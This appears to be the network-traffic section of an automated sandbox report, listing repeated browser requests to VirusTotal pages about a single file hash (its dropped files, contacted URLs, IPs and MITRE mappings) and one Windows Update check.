_ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTA0OTA4NjAzNzctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTQxLjE5MQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTc4MTI2MjA4MzgtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTQzLjc0OQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3pC1lROSsYyfH1k&MD=af7277zy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQzNzk1MzU1NzMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTQ2LjQzNQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTc3MDAyMjU2OTgtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTQ5LjE3sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQ3NzQ0NDAyOTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTUxLjkxOQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTU4MTA2MDY2ODQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU0LjY1NQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonCache-Control: no-cacheAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTA1NzUxNDI0NTctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjM4OA==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTk5MTY2MjYzNDgtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTE1MzM3NDQ1ODQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTY3ODY2ODY3MzctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/mitre_format?link=true HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTUwNzQ0MTQ1NjUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQxsec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTU2NDQyNTM2MTYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTAyMDQwMjIxOTYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTY0MjE5OTA2MjMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTY2OTQ4MTg3ODMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_urls HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTYyNDUzODk2NTktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTMzOTIzOTA0NzEtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwOQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTYyOTE2OTk4OTUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQxsec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
